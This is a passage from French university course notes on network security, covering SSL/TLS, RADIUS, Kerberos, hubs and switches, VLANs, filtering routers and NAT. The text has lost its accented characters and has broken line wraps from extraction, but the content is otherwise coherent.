translation dadresse (pour rsoudre les problmes dpuisement des adresses IP) ;
pourquoi changer quand ce que lon a nous convient parfaitement ?
Contrairement IPv4, dont le succs provient pour lessentiel des premiers utilisateurs,
lavenir de IPv6 peut cependant tre assur par les socits commerciales fournisseurs
dune infrastructure de communication (fournisseurs daccs Internet en tte), qui voient
en IPv6 une solution lgante et efficace un certain nombre de problmes qui ne se
posent pas lutilisateur final : la gestion de la qualit de service et de la mobilit sont ici
de bons exemples des besoins qui pourraient, terme, mener une gnralisation de la
pile IPv6 jusqu lquipement final des clients.

SSL - TLS
SSL est un protocole dvelopp par Netscape (en relation avec MasterCard, Bank of
America, MCI et Silicon Graphics), existant actuellement en version V3 et repris par l'
IETF
sous le nom TLS V1.
Le protocole est structur en 2 niveaux:

Niveau bas : SSL record protocol , qui s'


appuie sur un protocole de transport
fiable (TCP en pratique), et qui permet l'
encapsulation de protocoles de niveaux
suprieurs.
Niveau haut : SSL handshake protocol , qui permet aux correspondants de
s'
authentifier mutuellement et de ngocier une cl de session pour la
communication, et qui met en oeuvre un algorithme cl publique. La
communication est protge en confidentialit par un algorithme de type DES, et
en intgrit par une fonction de scellement (type MD5). Un mcanisme de cache
permet s'
acclrer la procdure de ngociation initiale en cas de communications
successives nombreuses (cas des applications Web par exemple).

SSL est disponible dans les navigateurs Web, mais, situ au niveau 4 de l'
architecture
OSI, il n'
est en principe pas limit au protocole HTTP.
La scurisation des transactions par SSL 2.0 est base sur un change de cls entre
client et serveur. La transaction scurise par SSL se fait selon le modle suivant:

Dans un premier temps, le client se connecte au site marchand scuris par SSL
et lui demande de s'
authentifier. Le client envoie galement la liste des
cryptosystmes qu'
il supporte, trie par ordre dcroissant selon la longueur des
cls.
Le serveur rception de la requte envoie un certificat au client, contenant la cl
publique du serveur, signe par une autorit de certification (CA), ainsi que le
nom du cryptosystme le plus haut dans la liste avec lequel il est compatible (la
longueur de la cl de chiffrement - 40 bits ou 128 bits - sera celle du
cryptosystme commun ayant la plus grande taille de cl).
Le client vrifie la validit du certificat (donc l'
authenticit du marchand), puis cre
une cl secrte alatoire (plus exactement un bloc prtendument alatoire),
chiffre cette cl l'
aide de la cl publique du serveur, puis lui envoie le rsultat (la
cl de session).

71

CNAM Jean-Christophe GALLARD

Le serveur est en mesure de dchiffrer la cl de session avec sa cl prive. Ainsi,


les deux entits sont en possession d'
une cl commune dont ils sont seuls
connaisseurs. Le reste des transactions peut se faire l'
aide de cl de session,
garantissant l'
intgrit et la confidentialit des donnes changes.

Alors que SSL 2.0 ne permet que lauthentification du serveur vis--vis du client, SSL 3.0
vise raliser une authentification mutuelle des parties.

Handshake SSL V3

SSL record protocol

72

CNAM Jean-Christophe GALLARD

Radius
Concepts

RADIUS (Remote Authentication Dial-In User Service) est un protocole de transport de


donnes dauthentification. Normalis par lIETF en janvier 1997 dans la RFC 2058,
RADIUS avait essentiellement pour objectif de fournir aux fournisseurs daccs Internet
un moyen pour ne grer quune seule base dutilisateurs, et ce quel que soit le point
daccs auquel ces derniers se connectaient.
Actuellement dans sa seconde version, la dernire dfinition du protocole a t tablie en
juin 2000 dans la RFC 2865.
Larchitecture de RADIUS repose sur trois acteurs distincts :

le poste utilisateur ; il sagit de la station de travail partir duquel est mis la


requte dauthentification,
le client RADIUS ; il sagit du point daccs au rseau (serveur RAS, Firewall,
routeur)
le serveur RADIUS ; le point central o les clients transmettent les donnes
dauthentification.

En complment de cette infrastructure, un serveur dauthentification est ncessaire pour


effectuer lopration dauthentification proprement parler.
Dans un premier temps, le poste utilisateur effectue une premire requte (variable selon
le service cible) auprs du client RADIUS. Selon le service employ, le client RADIUS
10
transmet au poste utilisateur une invite spcifique fournir ses authentifiants .
Munis de ces informations, le client RADIUS transmet alors une requte daccs auprs
du serveur RADIUS, et contenant les authentifiants fournis par le poste utilisateur.
Le serveur valide alors les donnes utiles la requte, dont les authentifiants utilisateurs,
et envoie au client une acceptation ou un refus.
RADIUS utilise le port UDP 1812.

Scurit du protocole

Le principal lment de scurit du protocole RADIUS consiste en lexistence dun secret


partag entre le client et le serveur. Ce secret est utilis pour les oprations de
chiffrement/dchiffrement des donnes entre le client et le serveur, ainsi que pour
lauthentification et le contrle dintgrit de certains paquets.
La norme ne prcise pas ce que doit tre ce secret, mais elle interdit explicitement le
partage dun secret nul. En revanche, la RFC recommande ( should ) lutilisation dun
secret ayant le mme niveau de complexit quun mot de passe de plus de 16 caractres.
Lorsque le client effectue une premire requte daccs son serveur, il transmet un ala
(Request Authenticator RA) de 16 octets au serveur. Ce dernier rpond par un hash
MD5 de la concatnation des champs Code , ID , Longueur , Ala ,
Attributs et du fameux Secret . Le secret ntant connu que du client et du serveur,
le client peut alors calculer une rponse thorique son ala et compare le rsultat de
son calcul avec celui renvoy par le serveur, lui permettant ainsi dauthentifier le serveur
et de garantir que le paquet initial est rest intgre.

10

Sauf sil sagit de PPP, auquel cas les donnes dauthentification taient dj prsentes dans la
premire requte.
73

CNAM Jean-Christophe GALLARD

Afin dviter que les authentifiants fournis au serveur par le client ne transitent en clair sur
rseau, ces derniers sont envoys chiffrs au serveur selon lalgorithme de Cipher
Block Chaining suivant :
1. Une fonction de padding est applique aux authentifiants afin dobtenir un flux
binaire dune taille multiple de 16 octets,
2. Ce flux binaire est alors dcoup en blocs de 16 octets,
3. Le premier bloc B1 est chiffr par la fonction K1=MD5(Secret + RA) XOR B1
4. Les ventuels autres blocs Bn sont ensuite chiffrs par la fonction :
Kn=MD5(Secret+Kn-1) XOR Bn
Il sagit ici du cas gnral de chiffrement des authentifiant ; les clefs MS-CHAP sont
chiffrs selon un mcanisme similaire, mais pour la mise en uvre de tunnels, un vecteur
dinitialisation de 16 bits est ajout au MD5 (K1=MD5(Secret + RA+VI) XOR B1).

Kerberos

Le protocole Kerberos fut cr l'


origine au sein du MIT en 1983 par
les ingnieurs travaillant sur le Projet Athena. Kerberos V5 est
dsormais un standard de l'
IETF (Internet Engineering Task Force)
dont les spcifications sont dcrites par la RFC 1510, le format des
jetons changs tant quant lui dcrit dans la RFC 1964.
Dans son principe, Kerberos est un mcanisme d'
authentification
mutuel entre clients et serveurs ; un client ralise une authentification sur un serveur
Kerberos afin d'
obtenir un jeton d'
accs pour une ressource tierce. Ce jeton d'
accs,
validit limite dans le temps, sert alors de moyen d'
authentification pour accder la
ressource considre.

Principes et Terminologie

Le systme Kerberos est principalement un serveur dauthentification externe, dont le


protocole est fond sur le modle de Needham et Schroeder publi en 1978 ( Using
Encryption for Authentication in Large Networks of Computers ).
Larchitecture de Kerberos constitue une architecture tripartite :

Le client
Le serveur de ressources
Une (ou plusieurs) autorit(s) approuve(s).

Lautorit approuve (AA) est un serveur dit de confiance , et reconnu comme tel la
fois par le client et le serveur. On prsuppose par ailleurs que lautorit approuve ne
constitue pas le maillon faible du systme, c'
est--dire quil nest vulnrable aucune
attaque connue.
Avant de poursuivre plus avant dans la description du schma dauthentification, il est
ncessaire dintroduire quelques notions de terminologie.
74

CNAM Jean-Christophe GALLARD

Un principal Kerberos dsigne un client du protocole, identifiable par un nom


unique. Un client ou un serveur constitue un principal Kerberos
Un Key Distribution Center (KDC) est une autorit approuve qui stocke les
informations de scurit relatives aux principaux. En outre, il gnre et gre les
clefs de session.
Un royaume (ou realm ) Kerberos est une organisation logique dans
laquelle il existe au moins une autorit approuve et qui est capable dauthentifier
les principaux dclars sur ce serveur.
Un ticket est une structure de donnes constitue dune partie chiffre et
dune partie claire. Les tickets servent authentifier les requtes des principaux. Il
existe par ailleurs deux types de ticket :
o Les tickets TGT (Ticket Granting Ticket)
o Les tickets ST (Service Ticket)

Un systme Kerberos assure deux types de service, par ailleurs non ncessairement
hbergs sur la mme machine ; un service dauthentification (AS ou Authentication
Service ) et un service doctroi de tickets (TGS ou Ticket Granting Service ).
Dans Kerberos, une AA (ie un KDC) gnre et stocke les clefs secrtes (Ksec) des
principaux qui lui sont rattachs.
Pour des raisons de scurit, ces clefs secrtes ne servent que lors de la phase initiale
dauthentification : dans toutes les autres phases, on utilise des clefs de session
jetables .
Prcisons que le systme Kerberos V5, tel que dfini dans la RFC 1510, nutilise pas
dalgorithmes clefs asymtriques ; ce sont des clefs partages qui sont utilises pour
lauthentification.

Dtails du protocole

Dans un premier temps, le client dsirant accder une ressource ralise une premire
phase visant sauthentifier auprs du service AS dun KDC.
Ce premier change va permettre au client de rcuprer un TGT auprs du service AS.
La requte initiale contient alors, en clair, lidentit du requrant et le serveur pour lequel
on demande un ticket. La partie chiffre du TGT lest avec la clef secrte du client ce qui
implique que seul le bon utilisateur pourra dchiffrer ce TGT et donc sen servir
correctement.

Requte dauthentification sur un service dAS


Prcisons que, lauthentification mutuelle nest pas disponible lors de ce premier
change client/AS, c'
est--dire que le client nest pas en mesure didentifier avec
certitude le serveur dauthentification. En effet, celui-ci ne renvoie au client que de
linformation sous la forme de cls et de tickets, et lorsque le client dchiffre le message, il
na aucun moyen de vrifier si les donnes en clair sont cohrentes.
Ce TGT ne servira par la suite que pour rcuprer un ST auprs du service TGS, au
terme dun second change client/TGS.

75

CNAM Jean-Christophe GALLARD

Requte de Service Ticket sur un service TGS


Le ST ainsi obtenu est alors prsent au serveur de ressource qui valide ou non la
requte.

Requte daccs une ressource


Au final, la chronologie des changes ncessaires pour atteindre un service donn est
reprsente sur la figure suivante :

Gnration et traitement des tickets

Laccs une ressource est ainsi ralis en trois passes distinctes :


1. Gnration du ticket ST par le serveur et transmission au client,
2. Traitement du ticket ST par le client et prparation de la requte au serveur,
3. Traitement de la requte par le serveur et poursuite des changes.
Suite la requte initiale du client, le serveur lui renvoie une structure de donnes chiffre
avec sa clef secrte et contenant :

Une clef de session en clair


La mme clef de session, chiffre avec la clef secrte du serveur de ressources
Un horodatage

76

CNAM Jean-Christophe GALLARD

Gnration dun ST
Cette structure de donnes est dchiffre par le client, qui se sert alors de son contenu
pour prparer une requte destination du serveur de ressource. Cette requte est
compose :

de la clef de session chiffre avec la clef secrte du serveur de ressource (tel que
nous la transmis le KDC)
dun authentifiant, chiffr avec la clef de session.

Traitement du ticket ST par le client


Lorsque le serveur de ressource rceptionne cette requte, il dchiffre la clef de session
avec sa clef secrte, puis utilise cette clef de session pour dchiffrer lauthentifiant.

Traitement de la requte daccs par le serveur de ressources


Lauthentifiant fourni par le client contient une structure de donnes dont la cohrence est
vrifie aprs dchiffrement par le serveur de ressource : si cet authentifiant est
correctement dchiffr le serveur de ressource valide alors la requte utilisateur.
77

CNAM Jean-Christophe GALLARD

Limitations

Bien que fond sur des bases solides, Kerberos possde un certain nombre de points
faibles :

Il ne supporte que les mcanismes de chiffrement symtriques, qui ncessitent un


partage et une mise jour des clefs entre les diffrents serveurs dadministration
et les clients. De plus, en cas de piratage des clefs, tous les clients peuvent tre
usurps
Si un pirate parvient dterminer une clef dun client, mme ancienne, et a russi
obtenir une capture de lensemble des messages de changement de mots de
passe, il pourra en dduire la clef en cours, puisque les messages de
changement de clef utilisent lancienne clef chaque fois.
Kerberos ne prend pas en compte les aspects dautorisation : cest chaque
systme de sadapter Kerberos pour traiter la problmatique de laccs aux
ressources.
Lutilisation des horodatages permet dviter le rejeu sauf si les horloges locales
sont trop dsynchronises, ou si le service dhorloge est pirat. Dans ce cas, il y a
un risque de rejeu ou de refus de service de la part du serveur. Kerberos
ncessite donc un service de temps fiable.

Il nexiste pas dauthentification mutuelle lors du protocole dauthentification initial. Le


ticket dlivr par le serveur est chiffr avec le Ksec de lutilisateur. Le serveur est suppos
comme authentique si Ksec est correct. Or, si Ksec est incorrect, le client dchiffrera le ticket
de faon incorrecte et naura pas moyen de sen apercevoir. Cest uniquement lors dune
requte auprs dun serveur de ressources et lorsque ce dernier lui refusera laccs (les
informations contenues dans les tickets nont alors aucune chance dtre cohrentes) quil
pourra souponner que le serveur dauthentification est un leurre.

78

;
1 ;
1# ;

,>,7#3 # ? @AB&/
C
2

<

Vue densemble
Chaque couche rseau est indpendante selon les principes dfinis par lISO, ce qui a
pour consquence directe que chaque couche rseau est sensible certaines attaques.
Aussi, chaque couche rseau correspond un ensemble de mcanismes de scurit.
De part leur nature et la fonction quils occupent au sein du rseau, les lments actifs
proposent des solutions pour scuriser une ou plusieurs couches rseau.

Les chssis
Les chssis sont souvent considrs, tort, comme des quipements totalement passifs
dont lutilit principale rside dans un systme dhbergement physique dautres lments
de rseaux plus intelligents. On ignore alors souvent que ces matriels peuvent supporter
certaines fonctions de scurit.
Dans les faits, les mcanismes de scurit mis en uvre dans les chssis ont surtout
pour but de contrer des menaces de type dni de service accidentelles (panne dun
lment, temprature hors norme, coupure lectrique), mais on y trouve galement des
fonctions dadministration distantes participant la scurit densemble:

Ventilation et alimentations doubles,


Alimentations de secours,
Agent dadministration SNMP ou autre (serveur HTTP par exemple),
Sonde RMON pour le debugging distance,
Mcanismes de remplacement chaud (hot swapping),
Dtection de pannes et bascule automatique dun module sur un autre

79

CNAM Jean-Christophe GALLARD

Les ponts
Un pont est un quipement rseau de bas niveau (Ethernet par exemple), permettant de
sparer un segment en deux. A lorigine, cette volont de sparation avait un double
objectif :

Assurer une meilleure rpartition du trafic (pontage contre saturation) par un


cloisonnement des flux sur chaque segment,
Permettre dallonger la longueur physique dun segment, le pont tant alors utilis
comme un simple rpteur / amplificateur de signal.

Ce cloisonnement fonctionne de manire dynamique, par auto-apprentissage de la


topologie du rseau :
Le pont coute les deux segments en permanence afin de dterminer, de part et
dautre, quelles sont les machines prsentes sur chaque segment ; quand une
machine dun segment met une trame une machine du mme segment, le pont ne
retransmettra pas cette trame sur le second segment dont il a la charge.
Ce mcanisme limite alors les possibilits dcoute, dusurpation dadresse Ethernet mais,
surtout limite le trafic entre les deux segments.
Exemple de pontage pour limiter la saturation dun segment :

80

CNAM Jean-Christophe GALLARD

Ce mcanisme a toutefois un effet indsirable : en cas de boucle dans le rseau, une


trame mise destination dun autre segment peut se retrouver duplique larrive,
comme lindique le schma suivant :

Cet inconvnient peut tre contourn par lapplication dun algorithme dit de spanning
tree , permettant dviter un tel phnomne. Linconvnient se transforme alors en
avantage dans la mesure o, en cas de dfaillance de lun des ponts, on peut basculer
le routage sur lun des ponts restants (routage de secours).

Les concentrateurs
Un concentrateur, ou Hub en anglais, est un quipement de rseau couche basse
permettant la mise en place dun segment Ethernet partag par plusieurs machines. Il se
compose gnralement dun botier disposant de ports dentre/sortie sur lesquels on
connecte les quipements terminaux. Il est galement possible de cascader plusieurs
concentrateurs entre eux afin de disposer dun nombre de ports physiques plus important
pour un mme segment.

Un concentrateur demeure par dfinition un quipement de rseau passif : il se contente


de rpter sur lensemble de ses ports les signaux quil reoit, et nassure donc aucun
mcanisme de contrle de flux. Par construction, il sagit donc dun quipement
assurant la diffusion complte de linformation qui transite par lui, sans rel contrle.
Du fait de sa passivit, un concentrateur nassure donc pas de mcanisme de scurit en
tant que tel, mais de nombreuses volutions ont offert la possibilit dassumer de telles
fonctions, mme si elles demeurent de niveau lmentaire.

81

CNAM Jean-Christophe GALLARD

Brouillage de trame

Le principe du brouillage de trame consiste ne diffuser les trames reues quaux seuls
ports destinataires, un peu comme le ferait un commutateur. Cependant, sagissant dun
systme diffusion, les autres ports reoivent tout de mme une information, afin de
pouvoir traiter les problmes de collision, savoir une trame Ethernet de mme taille que
celle dorigine mais dont le contenu est inintelligible ; seul le port destinataire reoit alors
effectivement la trame complte.
Ce mcanisme impose que le concentrateur soit alors capable de reconnatre les
adresses Ethernet des machines qui lui sont connectes. Cette contrainte est assure par
la mise jour dune table de correspondance interne au concentrateur entre ports
physiques et adresses Ethernet, mais cette table est gnralement mise jour de faon
dynamique par une fonction dauto-apprentissage ; lorsquune trame est mise par un
quipement terminal, le concentrateur la reoit sur un de ses ports et met alors jour la
table en consquence et de faon automatique.
Le mcanisme ne permet donc pas de se protger efficacement contre une falsification
des adresses Ethernet.

Contrle dadresse

Le contrle dadresse consiste figer ladresse Ethernet dune station sur un port
particulier, et ce afin dempcher quun attaquant remplace une machine connecte par la
sienne. Si ladresse Ethernet de la machine ne correspond pas celle prvue pour ce
port, les communications sont alors interrompues sur ce port.
Le mcanisme offre toutefois une scurit de faible niveau puisquil est toujours possible
un attaquant de falsifier son adresse Ethernet.

Contrle de dconnexion

Certains concentrateurs offrent la possibilit dinactiver un port en cas de dtection dune


dconnexion. Cette fonctionnalit peut cependant tre contraignante dans la mesure o le
matriel ne sait pas toujours faire la diffrence entre un dbranchement physique de la
prise rseau et une extinction de la machine.

Inactivation programmable

Afin dviter une connexion pirate sur un port libre du concentrateur, les administrateurs
rseau dbrassent physiquement les prises inutilises. Cette opration demeure
contraignante car elle ncessite une opration dans les locaux techniques contenant les
baies de brassage.
Certains concentrateurs, grables distance, offrent la possibilit dinactiver un port par
une commande spcifique, simplifiant alors la procdure.

Les commutateurs
Dfinitions et fonctionnement

Un commutateur Ethernet, ou switch en anglais, est un quipement de rseau


couche basse similaire un concentrateur. La diffrence essentielle entre ces deux
quipements rside dans le fait quun commutateur viole sciemment le principe de
diffusion du protocole Ethernet : les trames Ethernet ne sont donc remises qu leur(s)
seul(s) destinataire(s) et non pas lensemble des machines prsentes sur le segment
Ethernet.
Ce mcanisme offre de nombreux avantages, tant en termes de performances quen
termes de scurit :

82

CNAM Jean-Christophe GALLARD

Lcoute sur le rseau demeure particulirement limite : les seules trames


pouvant tre captures sont les trames destination de sa propre machine, celles
que lon met soi-mme et les trames de broadcast.
La bande passante disponible nest pas partage ; chaque quipement
terminal dispose de la bande passante maximale puisquil est le seul mettre et
recevoir sur son propre segment physique.

La sous-couche MAC (Medium Access Control), gnralement matrialise dans Ethernet


par le protocole CSMA-CD, devient inutile sur les quipements terminaux : du fait de la
commutation des trames, cest le commutateur qui gre les missions de trames et donc
les problmes de collisions. Dans ce cas prcis, on saffranchit alors dune sous-couche
protocolaire, donc de temps de traitements.
Lorsque lon utilise un commutateur Ethernet, on associe chaque port physique une et
une seule machine.

Il est cependant possible de cascader un ou plusieurs concentrateurs sur un


commutateur ; cette technique est souvent utilise lorsque le nombre de ports Ethernet du
commutateur est insuffisant au regard du nombre de machines interconnecter, et ce en
raison du cot plus lev dun commutateur. En termes de scurit, mais galement de
performances, ce type darchitecture est proscrire puisque lon perd ici tous les
avantages acquis par le choix dun commutateur sur le segment rseau concern (coute
essentiellement).

Notion de VLAN

Le principal intrt que reprsente un commutateur par rapport un concentrateur rside


dans sa capacit grer des rseaux virtuels ou VLANs (Virtual Local Area Networks),
logiquement tanches entre eux.

83

CNAM Jean-Christophe GALLARD

Les VLAN peuvent tre dclars essentiellement selon trois mthodes (ou combinaisons
de ces trois mthodes) :

Une liste de ports sur le commutateur.


Une liste dadresse dun protocole de niveau 3 (IP,IPX)
Une liste dadresses MAC

Ce mcanisme a t originellement cr afin dviter aux administrateurs rseaux une


surcharge de travail lors de la migration physique dune machine.
En effet, en supposant quune entreprise dispose de deux rseaux physiques
indpendants, situs dans deux btiments distincts et quun utilisateur doivent dmnager
tout en restant raccord son rseau dorigine, les administrateurs de rseaux se verront
oblig de tirer un cble supplmentaire entre les deux btiments :

La technologie des VLANs permet dviter une telle opration physique par une simple reconfiguration de lquipement actif.
On dfinit alors sur les quipements autant de rseaux virtuels que ncessaire (deux
dans notre exemple), puis on affecte, chaque port, un ou plusieurs VLANs
dappartenance. Dans le cadre dun tel dmnagement, la machine de lutilisateur sera
alors connecte sur un port libre du commutateur du nouveau btiment, puis
ladministrateur rseau affectera ce port le VLAN auquel lutilisateur appartenait avant
son dplacement.

84

CNAM Jean-Christophe GALLARD

Les principes de base de lutilisation des VLANs se rsument alors aux deux points
suivants :

Sur un commutateur, ou un ensemble de commutateurs, on dfinit une liste de


rseaux virtuels
En labsence dautres mcanismes (routage par exemple), les VLANs sont
tanches entre eux : deux machines appartenant deux VLANs diffrents ne
peuvent pas communiquer directement mme si elles disposent de la mme
plage dadresse IP.

Routage inter-VLAN

Les commutateurs de niveau 2 ne savent pas grer les changes entre les VLANs, car
cela impose de remonter dans les couches rseaux au niveau 3 (rseau). Cependant
certains constructeurs proposent aujourdhui ou trs court terme des commutateurs
intgrant des fonctions de routage, y compris pour le routage inter-VLAN.
Il est cependant possible de raliser du routage entre les diffrents VLANs l'
aide d'
un
routeur, en utilisant par exemple le protocole 802.1Q pour rcuprer les informations de
VLAN issus des commutateurs. Notons que, dans ce cas, le routage inter-VLAN n'
a de
sens, du point de vue de la scurit, que si des filtres de paquets au niveau TCP/IP sont
implments.
Ainsi, lorsquun routeur rceptionne un paquet dun VLAN 1 destination dun VLAN 2 :

il vrifie que cette communication est autorise (par consultation de ses listes
contrle daccs ventuelles),
il d-taggue le paquet (suppression du tag du VLAN 1),
puis le re-taggue avec un numro de VLAN appropri (tag du VLAN 2),
et enfin, route le paquet vers sa destination.

Autres mcanismes de scurit

Dautres mcanismes de scurit ont t apports aux commutateurs, ces mcanismes


tant devenus natifs dans les commutateurs de dernire gnration :
Dsactivation dun port inutilis (protection contre un branchement pirate),

85

CNAM Jean-Christophe GALLARD

Reconnaissance des adresses Ethernet des quipements terminaux (permet la reconfiguration automatique des ports Ethernet des commutateurs en cas de dplacement
physique dune machine),
Dtection du branchement / dbranchement de machine, puis inactivation du port (vite le
remplacement dune machine par une autre),
Association statique, dynamique ou semi-statique entre une adresse IP et une adresse
11
Ethernet ,
Enfin, certains commutateurs disposent de capacits de routages intgres (on parle
alors abusivement - de commutateurs de niveau 3).

Les routeurs filtrants


Un routeur filtrant est un routeur auquel a t ajout des mcanismes de filtrage de
paquets rseau. La plupart des routeurs disponibles sur le march supportent en standard
un mcanisme au moins lmentaire de filtrage de paquets.
Le filtrage le plus lmentaire consiste bloquer ou laisser passer les paquets TCP/IP
en fonction :

Des adresses IP (source et destination).


Des ports de service utiliss (source et destination).

A ces fonctions de base, il est possible de trouver des mcanismes additionnels qui
permettent d'
tendre le filtrage tout ou partie des champs utiliss dans les paquets
TCP/IP. Ainsi, le filtrage des paquets peut tre mis en uvre sur les champs d'
options
TCP/IP, les flags (typiquement le flag ACK qui indique le sens de connexion), et les types
et les codes de protocoles (on pourra par exemple ne laisser passer que les codes
ECHO_REPLY et ECHO_REQUEST du protocole ICMP en interdisant les autres codes
ICMP, ce qui laisse donc la possibilit de "pinger" des machines).
Les avances technologiques dans le domaine du filtrage rendent cependant de plus en
plus difficile de dfinir prcisment la frontire entre un Firewall et un routeur filtrant. En
effet, les routeurs les plus volus sont capables de raliser :

Des filtrages de type stateful inspection , dans lequel c'


est l'
ensemble du
contexte d'
tat de connexion qui sert dterminer s'
il faut ou non bloquer les
paquets. En effet, jusqu'
peu les filtres n'
taient appliqus qu'
unitairement (c'
est
dire paquet par paquet, en considrant qu'
un paquet tait totalement
indpendant des autres). L'
arrive de cette technologie permet de filtrer plus
efficacement le flux rseau, en prenant par exemple en compte les mcanismes
de fragmentation de paquets.
Des filtrages au niveau du protocole lui-mme, dans lequel ce sont les protocoles
de niveau applicatif qui peuvent tre examins.

Ces dernires technologies apportent une nette amlioration dans l'


efficacit du contrle
de flux rseau. Ce sont elles qui permettent dsormais de filtrer efficacement des
protocoles qui jusqu'
maintenant taient difficiles apprhender (le cas du protocole
H323, qui utilise des ports ngocis, reste assez emblmatique de ce type de problme).

11

Dans le cas dune association statique, on fige dans la table ARP les couples @IP-@Mac. Pour
une association semi-dynamique, la table est remplie au fur et mesure de la dcouverte de
nouveaux lments, comme dans les associations dynamiques, mais chaque entre ne peut alors
plus tre modifie par la suite que par ladministrateur rseau.
86

CNAM Jean-Christophe GALLARD

Outre les mcanismes de filtrage, les routeurs peuvent galement se voir dots de
mcanismes de scurit permettant l'
utilisation d'
un rseau public non sr comme lien de
transit, tout en assurant la confidentialit, l'
intgrit des informations et lauthentification
de lmetteur. Souvent proposs en options ou sur des matriels spcifiques, ces
fonctions, souvent lourdes en termes de ressources matrielles, mettent en uvre des
mcanismes de scurit issus des travaux de l'
IETF sur la scurit du protocole IP
(IPSec). Ces mcanismes permettent pour l'
essentiel le chiffrement et / ou la signature
des donnes transitant sur le rseau.
Les routeurs IP offrent en standard de nombreux mcanismes de scurit. Non content
dassurer un acheminement correct des paquets vers leurs destinataires, et de la manire
la plus performante possible, les routeurs IP permettent galement dassurer un contrle
sur les flux transitant par eux.

87

)
0 $

$
!0 !

La Translation dadresse (NAT)


Concepts

La translation, ou masquage, dadresse, encore appele NAT (Network Address


Translation), a t initialement dveloppe pour pallier la pnurie dadresses IP lie au
protocole IP.
Si une adresse IP peut thoriquement prendre nimporte quelle valeur entre 0.0.0.0 et
255.255.255.255, certaines adresses IP sont cependant rserves des usages
particuliers.
Ainsi, toute adresse se terminant par 255 correspond traditionnellement une adresse de
sous-rseau entier, galement appele adresse de broadcast. Il nest galement pas
recommand dutiliser les adresses IP se terminant par un zro, ces adresses pouvant
tre utilises par certains systmes galement comme des adresses de broadcast
(systmes Unix BSD par exemple).
En outre, les adresses IP de 224.0.0.0 239.255.255.255 sont rserves au rseau
multicast (un quivalent IP aux systmes de diffusion multimdia ) : aucune machine ne
doit prendre une telle adresse, ces dernires tant alors rserves des rseaux de
diffusion multicast.
Enfin, la RFC 1918 spcifie certaines classes dadresses comme ne devant tre utilises
que pour des rseaux privs : par dfinition, ces classes dadresses ne sont pas routables
sur lInternet. La RFC 1918 dfinit 3 classes dadresses prives, rsumes dans le
tableau ci dessous :

type de classe

nb de classes

premire adresse

dernire adresse

010.000.000.000

010.255.255.255

16

172.016.000.000

172.031.255.255

256

192.168.000.000

192.168.255.255

89

CNAM Jean-Christophe GALLARD

La translation dadresse permet alors de disposer sur un rseau interne dadresses de


classes prives, tout en autorisant lmission de requtes destination de lInternet. Le
mcanisme retenu consiste alors utiliser un quipement actif spcialement configur,
qui va traduire les adresses prives en adresses officielles, et vice versa :
fonctionnellement, il sagit donc dune simple traduction dadresse bi-directionnelle base
sur des tables de correspondances, et selon un fonctionnement de type Proxy ou
relais .
Selon le nombre dadresses internes et prives, il existe trois types de translation
dadresse :

type de
NAT

nombre
d'adresses

fonctionnement

traitement
des appels
entrants

externes internes

masquage
d'adresse

p=1

contexte de communication,
allocation dynamique de port TCP

routage forc
par type de
service

conversion
dynamique
d'adresse

p<N

contexte de communication,
allocation dynamique de port TCP

routage forc
par type de
service

conversion
statique
d'adresse

p=N

conversion biunivoque d'


adresse

routage
normal

Masquage dadresse

Egalement connue sous le nom de Port Address Translation (ou PAT), cette technique est
utilise lorsque lon ne dispose que dune seule adresse officielle Internet mais que lon
souhaite permettre N machines internes de communiquer avec lextrieur.
Lorsque lquipement actif ralisant la translation rceptionne un paquet sortant, il tablit
un contexte de session et relaye le paquet vers lextrieur en se choisissant un port
source qui identifiera lmetteur. Vu de lextrieur, les requtes semblent toutes provenir
dune seule et mme machine (gnralement le routeur dinterconnexion).

90

CNAM Jean-Christophe GALLARD

Le seul inconvnient de cette technique rside dans le fait quil est ici impossible davoir
un serveur interne accessible depuis lextrieur : cette technique ne fonctionne donc que
si toutes les machines, cot rseau interne, sont des clients.

Conversion dynamique dadresse

Cette mthode est utilise lorsque lon dispose de N adresses officielles mais que le
nombre de machines cot interne est suprieur N. Dans ce cas de figure on joue alors
sur le fait quil est trs peu probable que toutes les machines internes dcident de
communiquer avec lextrieur en mme temps.
Lquipement actif dispose alors dun pool dadresses, quil va alors allouer
dynamiquement au fil des communications aux clients. Quand un client termine sa
session, ladresse alloue est alors remise dans le pool des adresses libres.
Exemple :

On dispose dadresses officielles de 145.10.10.1 145.10.10.10 (soit 10 adresses


en tout)
Le rseau interne est compos de 200 machines ayant pour adresses
192.168.1.1 192.168.1.200
La machine 192.168.1.50 met une trame vers lextrieur : le NAT lui alloue une
adresse officielle en 145.10.10.1 (gnralement la premire libre)
La machine 192.168.1.68 met une trame vers lextrieur : le NAT lui alloue une
adresse officielle en 145.10.10.2
La machine 192.168.1.50 termine sa requte : ladresse 145.10.10.1 est alors
libre
La machine 192.168.1.78 met une trame vers lextrieur : le NAT peut alors lui
allouer nimporte quelle adresse libre (donc y compris 145.10.10.1 qui vient dtre
libre).
Etc.

Linconvnient majeur de cette technique rside dans le fait quil peut arriver un moment
o il nexiste plus une seule adresse libre dans le pool dadresses officielles : dans ce cas,
le client ne pourra pas tre servi. En outre, lallocation des adresses tant purement
dynamique, on ne pourra pas mettre en place un serveur cot interne puisque celui-ci
naura pas la garantie dobtenir toujours la mme adresse.

Conversion statique dadresse

Il sagit du cas le plus simple : on dispose dautant dadresses officielles que dadresses
internes et on alloue alors statiquement les adresses officielles une une. Il est
dsormais possible de mettre en place un serveur puisque ce dernier aura toujours la
mme adresse officielle

Mise en place dun systme de translation dadresses

Dans la pratique, les administrateurs rseaux souhaitant mettre en uvre un systme de


translation dadresses utilisent simultanment deux de ces techniques ou les trois en
mme temps. Ainsi, on peut associer statiquement deux adresses officielles deux
serveurs, puis mettre en uvre un pool dadresses alloues dynamiquement et destines
aux clients, ce qui permet de mnager la chvre et le chou.

Avantages et inconvnients de la translation dadresses


En termes de SSI, la translation dadresse permet surtout de masquer la topologie IP de
son rseau interne lextrieur. Comme le point daccs oblig est gnralement une
machine unique, on peut en profiter pour raliser des contrles complmentaires (filtrages
sur adresses et protocoles, contrle de contenus etc.).
91

CNAM Jean-Christophe GALLARD

Ces techniques permettent surtout dviter la rservation dun trop grand nombre
dadresses officielles.
En revanche, les mcanismes de translation dadresse souffrent de certaines limitations
de conceptions. En effet, lInternet a t construit sur le principe du bout-en-bout (end-toend principle). Ce principe fondamental veut que toute lintelligence et toutes les
manipulations seffectuent chaque extrmit dune communication, le rseau tant
suppos dnu dintelligence, en ce sens quil ne fait que relayer les communications dun
nud un autre jusqu leur destination ; les quipements intermdiaires ne sont donc
12
pas censs modifier les paquets au cours de leur transit .
